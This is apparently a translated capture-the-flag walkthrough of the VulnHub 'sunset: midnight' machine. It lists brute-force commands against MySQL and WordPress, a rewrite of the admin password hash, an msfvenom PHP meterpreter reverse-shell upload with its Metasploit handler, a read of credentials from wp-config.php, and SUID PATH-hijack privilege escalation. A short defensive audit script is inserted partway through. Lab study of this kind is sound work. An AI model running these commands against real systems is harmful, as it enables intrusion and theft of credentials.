PJzhang: vulnhub target machine, sunset series, SUNSET: MIDNIGHT

Morning~~~

Address: https://www.vulnhub.com/entry/sunset-midnight,517/

The focus is on tools and approach.

nmap 192.168.43.0/24

Target machine IP: 192.168.43.113

nmap -A -p1-65535 192.168.43.113

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1

Visiting http://192.168.43.113/ redirects to http://sunset-midnight/

vim /etc/hosts
192.168.43.113 sunset-midnight

Visiting http://sunset-midnight/ shows a WordPress site

http://sunset-midnight/wp-login.php

wpscan --url http://sunset-midnight/ --enumerate u

wpscan --url http://sunset-midnight/ -U admin -P mima.txt -t 100

hydra 192.168.43.113 mysql -l root -P /usr/share/wordlists/rockyou.txt -t 1

[3306][mysql] host: 192.168.43.113 login: root password: robert

If the message unblock with 'mysqladmin flush-hosts' appears, restart the target machine and run the brute force again

mysql -uroot -p -h sunset-midnight

show databases;
use wordpress_db;
show tables;
select user_pass from wp_users;
The password field shows $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/

The MD5 hash of 123456 is e10adc3949ba59abbe56e057f20f883e

update wp_users SET user_pass="e10adc3949ba59abbe56e057f20f883e" where id=1;

The WordPress admin username and password are now admin/123456
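A defender-side check for the wp_users change above, as an added example that is not part of the original post: WordPress of this era stores phpass values starting with $P$ but still accepts a bare 32-character MD5 and rehashes it on the next successful login, so the script flags both a raw MD5 and any hash that differs from a saved baseline. The snapshots, the "editor" account, the function names and the regexes are constructed for the example.

```python
import re

# Formats seen in wp_users.user_pass (regexes are this example's own).
PHPASS = re.compile(r"^\$[PH]\$[./0-9A-Za-z]{31}$")   # portable phpass, 34 chars
RAW_MD5 = re.compile(r"^[0-9a-fA-F]{32}$")            # legacy unsalted MD5


def classify(user_pass):
    """Return the storage format of one user_pass value."""
    if PHPASS.match(user_pass):
        return "phpass"
    if RAW_MD5.match(user_pass):
        return "raw-md5"
    return "other"


def audit(baseline, current):
    """Compare two {user_login: user_pass} snapshots; return (login, reason) pairs."""
    findings = []
    for login, value in sorted(current.items()):
        old = baseline.get(login)
        if classify(value) == "raw-md5":
            # Written straight into the table, not through WordPress itself.
            findings.append((login, "unsalted MD5 in user_pass"))
        elif old is None:
            findings.append((login, "account not in baseline"))
        elif old != value:
            # Also catches the rehash WordPress performs after an MD5 login.
            findings.append((login, "hash changed since baseline"))
    return findings


# Constructed snapshots. The admin values are the ones shown in this post;
# the editor row and the rehashed admin value are made up.
BASELINE = {
    "admin": "$P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/",
    "editor": "$P$B" + "c" * 30,
}
AFTER_UPDATE = dict(BASELINE, admin="e10adc3949ba59abbe56e057f20f883e")
AFTER_LOGIN = dict(BASELINE, admin="$P$B" + "d" * 30)

if __name__ == "__main__":
    for name, snap in (("after update", AFTER_UPDATE), ("after login", AFTER_LOGIN)):
        for login, reason in audit(BASELINE, snap):
            print(f"{name}: {login}: {reason}")
```

The baseline would come from a periodic export of user_login and user_pass, compared against the live table together with the record of legitimate password resets.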

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw > muma.php

appearance---themes---upload muma.php

Visiting http://sunset-midnight/muma.php/ shows http://sunset-midnight/wp-content/uploads/2020/09/muma.php

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

Visit http://sunset-midnight/wp-content/uploads/2020/09/muma.php to get the reverse shell

shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@midnight:/var/www/html/wordpress/wp-content/uploads/2020/09$

cat /etc/passwd
jose:x:1000:1000:jose,,,:/home/jose:/bin/bash is worth noting

Go into /var/www/html/wordpress and look at wp-config.php

/** MySQL database username */
define( 'DB_USER', 'jose' );
/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

https://www.cmd5.com/
https://www.somd5.com/

sudo -l cannot be used

su jose
The password is 645dc5a8871d2a4269d4cbe23f6ae103

sudo -l does not work

Look for SUID files
find / -perm -u=s -type f 2>/dev/null

/usr/bin/status is worth noting

cd /tmp
echo "/bin/bash" > service
chmod 777 service
echo $PATH
export PATH=/tmp:$PATH
status

Root privileges obtained
root@midnight:/tmp#
cat user.txt, in the home directory
956a9564aa5632edca7b745c696f6575

Original article: https://www.cnblogs.com/landesk/p/13649017.html